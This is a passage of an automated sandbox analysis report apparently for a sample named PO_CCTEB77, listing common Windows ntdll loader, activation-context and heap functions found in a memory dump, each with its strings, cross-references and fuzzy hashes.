                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-204845295
                                                                            • Opcode ID: af9273012d9abfcf5bed1e93762ac5c4850037d0c14a81534b2c9b70c8cba37b
                                                                            • Instruction ID: 6fe1237ce6c5185fdca35b30b0501d610d3a119822ef31e0b742fc3511e844c6
                                                                            • Opcode Fuzzy Hash: af9273012d9abfcf5bed1e93762ac5c4850037d0c14a81534b2c9b70c8cba37b
                                                                            • Instruction Fuzzy Hash: FC51B1726483049FD720DF24D8A5B9BB7E8FF84748F54091DFA8597195D730EA08CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • SXS: %s() passed the empty activation context, xrefs: 01832165
                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01832160, 0183219A, 018321BA
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018321BF
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01832180
                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0183219F
                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01832178
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                            • API String ID: 0-861424205
                                                                            • Opcode ID: 1a473f2784b470388d3933b3484b7d765486d853f4e9c764dd042c6e66a81b24
                                                                            • Instruction ID: 97614b18b325998da436e25ee9e7cc2e124f48952f7bca0eb9a58502732e221b
                                                                            • Opcode Fuzzy Hash: 1a473f2784b470388d3933b3484b7d765486d853f4e9c764dd042c6e66a81b24
                                                                            • Instruction Fuzzy Hash: 8B312276B412257BEB219A9A8C51F5FFB69DBE4B50F09015DFB04AB241D270EF00C6E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpInitializeImportRedirection, xrefs: 01838177, 018381EB
                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 018381E5
                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01838170
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017FC6C3
                                                                            • LdrpInitializeProcess, xrefs: 017FC6C4
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01838181, 018381F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-475462383
                                                                            • Opcode ID: 12d93916264e0fa6c3cf93a833358454bfa852fb5a511481b8215c29e1262309
                                                                            • Instruction ID: e3d64888b39f5c53283ada4627dae2dd0620e30a9d1cceb78d04dda113effca4
                                                                            • Opcode Fuzzy Hash: 12d93916264e0fa6c3cf93a833358454bfa852fb5a511481b8215c29e1262309
                                                                            • Instruction Fuzzy Hash: F631E4B16447469BD224EF2CDC8AE1BF7D4AFD4B10F04065CF984AB395D620EE04CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0180096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 01802DF0: LdrInitializeThunk.NTDLL ref: 01802DFA
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BA3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800BB6
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D60
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01800D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 1404860816-0
                                                                            • Opcode ID: 7f42144fd35c5115ae4f39a8b6a559e083c00a0058bbd6e9a25b57603d1cc088
                                                                            • Instruction ID: 33b674e3baae2083a23150ffcc1a9378de43de892bcc1965ec2f380dc9a60a43
                                                                            • Opcode Fuzzy Hash: 7f42144fd35c5115ae4f39a8b6a559e083c00a0058bbd6e9a25b57603d1cc088
                                                                            • Instruction Fuzzy Hash: FF426E71900719DFDB61CF28C840BAAB7F5FF44314F1445A9E989EB282D770AA85CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                            • API String ID: 0-379654539
                                                                            • Opcode ID: 3ff0e57287fb6e1484bc3f6cb24d19c9f1a633fe40bf18995cd70fe9363aa4fb
                                                                            • Instruction ID: 712640d1f0309bb9072a0406a6a4839d70764935a1f061cddaefaaaef08879b9
                                                                            • Opcode Fuzzy Hash: 3ff0e57287fb6e1484bc3f6cb24d19c9f1a633fe40bf18995cd70fe9363aa4fb
                                                                            • Instruction Fuzzy Hash: 76C1687410838A8FD712CF58C044B6AF7E5BF94B05F0489AEF996DB251E734CA49CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017F855E
                                                                            • @, xrefs: 017F8591
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017F8421
                                                                            • LdrpInitializeProcess, xrefs: 017F8422
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1918872054
                                                                            • Opcode ID: 9325e85b183ad03e3a15cd832d4b57ee17acb9619113cca959df6e4a96a7cfee
                                                                            • Instruction ID: 12a0d698fae5a204cc2bdaa0f650d784131af86ab2040c8214a7ff0a7f1b896c
                                                                            • Opcode Fuzzy Hash: 9325e85b183ad03e3a15cd832d4b57ee17acb9619113cca959df6e4a96a7cfee
                                                                            • Instruction Fuzzy Hash: 6391AB71508745AFDB22EF25CC54EABBBE8BB84744F44092EFA84D6251E374DA048B63
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018321D9, 018322B1
                                                                            • SXS: %s() passed the empty activation context, xrefs: 018321DE
                                                                            • .Local, xrefs: 017F28D8
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018322B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                            • API String ID: 0-1239276146
                                                                            • Opcode ID: 0f7d40ca5a0f8c260ae15de5d69deb0afac264c5fe363ebf35c1f50b24fb64b1
                                                                            • Instruction ID: 39fb450bd1abb8762e729e1ee1b21295cce42c3e43b8e93716992ef013b66697
                                                                            • Opcode Fuzzy Hash: 0f7d40ca5a0f8c260ae15de5d69deb0afac264c5fe363ebf35c1f50b24fb64b1
                                                                            • Instruction Fuzzy Hash: 63A179319412299BDB25CF68CC88BAAF7B1BF58314F1441E9DA58AB352D730DE80CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RtlDeactivateActivationContext, xrefs: 01833425, 01833432, 01833451
                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0183342A
                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01833437
                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01833456
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                            • API String ID: 0-1245972979
                                                                            • Opcode ID: 44253cfa73b56f69d0e19e0890f1b4c05a8a7c59d37b424391f1100204119c00
                                                                            • Instruction ID: b68d9f48966dcfdc48a8b1d1ff5e6121c1a5ec41fa4fb60e6f72de871652225d
                                                                            • Opcode Fuzzy Hash: 44253cfa73b56f69d0e19e0890f1b4c05a8a7c59d37b424391f1100204119c00
                                                                            • Instruction Fuzzy Hash: BF6101726047169BD7228F1DC881B2BF7E5AF90B60F18851DEA66DB341DB30EA01CBD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018210AE
                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01821028
                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01820FE5
                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0182106B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                            • API String ID: 0-1468400865
                                                                            • Opcode ID: 2992fb28395424c31df94e4f89ec6aac53525a55a5867b6cd0615959c6214a5a
                                                                            • Instruction ID: b8a1f4c9eb3bd1e6349da52eb3cb5bdf5e20f45a03c3163a1a55b4dd644ffe88
                                                                            • Opcode Fuzzy Hash: 2992fb28395424c31df94e4f89ec6aac53525a55a5867b6cd0615959c6214a5a
                                                                            • Instruction Fuzzy Hash: 5371B2B19043059FCB61DF18C8C5F97BBA8AFA5B54F20046CF9488B286D734D689CBD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017F4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0183362F
                                                                            • LdrpFindDllActivationContext, xrefs: 01833636, 01833662
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01833640, 0183366C
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 0183365C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 0-3779518884
                                                                            • Opcode ID: b6353a1f33df2c23e6f4da469160ab6dfd25eaeef39b98cf08532100b9713731
                                                                            • Instruction ID: d20b43845bd5ec67627c4cd5d5c508e678114a7c7f7b9ae99e0ba0140fafdd61
                                                                            • Opcode Fuzzy Hash: b6353a1f33df2c23e6f4da469160ab6dfd25eaeef39b98cf08532100b9713731
                                                                            • Instruction Fuzzy Hash: 7031E972900611AFEF36AA0CC889B67F7A4BB41754F0A416EEB06973D1E7A09DC087D5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0182A992
                                                                            • apphelp.dll, xrefs: 017E2462
                                                                            • LdrpDynamicShimModule, xrefs: 0182A998
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0182A9A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            • Opcode ID: 4083cd5adbbe06432b973d00a1f546ba4e64642313f824bdc5201879ce42926f
                                                                            • Instruction ID: 3ad0b3a59a0e7c4f0d733aec449b25803b541f69a6c418943f3862a81c1c2273
                                                                            • Opcode Fuzzy Hash: 4083cd5adbbe06432b973d00a1f546ba4e64642313f824bdc5201879ce42926f
                                                                            • Instruction Fuzzy Hash: BB3128B1B00212ABDB369F5DD8C5A6AB7F9FF88B04F250069F911E7245D7706B81CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017D327D
                                                                            • HEAP: , xrefs: 017D3264
                                                                            • HEAP[%wZ]: , xrefs: 017D3255
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                            • API String ID: 0-617086771
                                                                            • Opcode ID: 75a0e4d8bb10f12c47d1d8f7af4630f923d67613a4af98127d067b0bcffc47fc
                                                                            • Instruction ID: 5bd0fd84a0f1ff4983202626eaf3808176b75e9638bdac39c4ca9cce215df345
                                                                            • Opcode Fuzzy Hash: 75a0e4d8bb10f12c47d1d8f7af4630f923d67613a4af98127d067b0bcffc47fc
                                                                            • Instruction Fuzzy Hash: 9F92BC71A046499FDB25CF68C444BAEFBF1FF48300F188099E859AB392D735A942CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: 3b1cc2a0e01217866b81eaffeed386655e63e1506ad6fb14164c832f7f496fef
                                                                            • Instruction ID: fa53c9c7ad491f8457973d2bcc57dc3cfe5873af9d23ac6a2d8ec40f2e9d4eb2
                                                                            • Opcode Fuzzy Hash: 3b1cc2a0e01217866b81eaffeed386655e63e1506ad6fb14164c832f7f496fef
                                                                            • Instruction Fuzzy Hash: 8DF19D70A4060ADFEB26CF68C894BAAF7B5FF45304F1441A9E516DB381D734EA81CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $@
                                                                            • API String ID: 0-1077428164
                                                                            • Opcode ID: fc2e87ddf71e0d6c2c99f88d82d1f4cc7d393b5fbc2090851e81dce49e31e0fc
                                                                            • Instruction ID: fef9bac7a3c690d0912532eacf9c1723669e5da48e1a4d49192fd6ca11600cdc
                                                                            • Opcode Fuzzy Hash: fc2e87ddf71e0d6c2c99f88d82d1f4cc7d393b5fbc2090851e81dce49e31e0fc
                                                                            • Instruction Fuzzy Hash: 35C280716083519FE72ACF28C885BABFBE5AF88714F04892DF989C7241D734D945CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                            • API String ID: 0-2779062949
                                                                            • Opcode ID: caf98a70adb4f1c45e07bfb91eeeb2fe3c3bf65e268b92c37bdee42354a3e9bc
                                                                            • Instruction ID: bb7f7022bdbee12d3def1fa3ef2972429a4aeb4e741f21eadd1b37456db2e354
                                                                            • Opcode Fuzzy Hash: caf98a70adb4f1c45e07bfb91eeeb2fe3c3bf65e268b92c37bdee42354a3e9bc
                                                                            • Instruction Fuzzy Hash: 80A149729416299BDB21EB68CC88BEAB7B8EF48700F1001E9E909E7250D7359F84CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpCheckModule, xrefs: 0182A117
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0182A121
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0182A10F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-161242083
                                                                            • Opcode ID: 9bd180af797f3067094ef88ff0edfdfd1017ceac1a772859c0728a6746d3f47f
                                                                            • Instruction ID: 9215e1224dbbb11745d420d41427a0e1cbbbbc30830202b5612d684441b103e4
                                                                            • Opcode Fuzzy Hash: 9bd180af797f3067094ef88ff0edfdfd1017ceac1a772859c0728a6746d3f47f
                                                                            • Instruction Fuzzy Hash: 9671CF70A00206DFDB29DF68C988ABEB7F4FF48704F14446DE902E7655E674AA81CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            • Opcode ID: 3f71b36b70997a0d715d57bc478b94bcd09613199db05e6e68256fee7a4eb7fe
                                                                            • Instruction ID: 5b335b50209ff490f1f5f325a00b4ce040c7530dd0b28b5d1f11781b9a5f8418
                                                                            • Opcode Fuzzy Hash: 3f71b36b70997a0d715d57bc478b94bcd09613199db05e6e68256fee7a4eb7fe
                                                                            • Instruction Fuzzy Hash: B1618D706043059FDB29CF28C884BAAFBF1FF45704F14959AE459CB296D770E981CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 018382DE
                                                                            • Failed to reallocate the system dirs string !, xrefs: 018382D7
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 018382E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1783798831
                                                                            • Opcode ID: 0d34fed6089ad284271bb8af4911a872dc0acbbdd7113e6c2be9afd5fac086b8
                                                                            • Instruction ID: 6dff70c88e52e4b7ca81f88f53ee4faa8a4f5a0b1624258095952f32915ee5b5
                                                                            • Opcode Fuzzy Hash: 0d34fed6089ad284271bb8af4911a872dc0acbbdd7113e6c2be9afd5fac086b8
                                                                            • Instruction Fuzzy Hash: C64104B1500305ABC721EB68DC84F5BB7E8EF89750F14492EFA54D33A4E770DA008BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0187C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • @, xrefs: 0187C1F1
                                                                            • PreferredUILanguages, xrefs: 0187C212
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0187C1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                            • API String ID: 0-2968386058
                                                                            • Opcode ID: 83a3450777f286b5625d6eeae8a31370d8efd242dfb950bfc0f743ca806b7991
                                                                            • Instruction ID: ecdb7699a7236f170cb26f87eba13e5f728add22383b8300e940ff85f83e3824
                                                                            • Opcode Fuzzy Hash: 83a3450777f286b5625d6eeae8a31370d8efd242dfb950bfc0f743ca806b7991
                                                                            • Instruction Fuzzy Hash: BB416F72A1020EEBDB11DED8C895BEEBBB8AB14704F14416AE619F7280E774DB448B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01854144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                            • API String ID: 0-1373925480
                                                                            • Opcode ID: 61a6d2c15f736e749cabfc1c88346065be321b1f57a504e5c27e47a0d42c93ad
                                                                            • Instruction ID: dcf6179ce427fe8318ad3b45764f045106a6a026b915223567cb2d9d960c7ee3
                                                                            • Opcode Fuzzy Hash: 61a6d2c15f736e749cabfc1c88346065be321b1f57a504e5c27e47a0d42c93ad
                                                                            • Instruction Fuzzy Hash: A5414572A0065CCBEB26DBE9C844BACBBB9FF55380F140459DD01EB781EB348A81CB11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01844755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01844888
                                                                            • LdrpCheckRedirection, xrefs: 0184488F
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01844899
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-3154609507
                                                                            • Opcode ID: 582472af68b6c3d53298b2d80f95781287c0227bf8e14677eaff70a1dbf02930
                                                                            • Instruction ID: 2c9c017746d8947a83ac8c8b682acb4b9ebad0ff5acae2d02089c106dfa3642c
                                                                            • Opcode Fuzzy Hash: 582472af68b6c3d53298b2d80f95781287c0227bf8e14677eaff70a1dbf02930
                                                                            • Instruction Fuzzy Hash: 3341C172A0475D9BEB21CE6CD840B26BBE4AF49754B050669ED48D7312EB31DA01CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
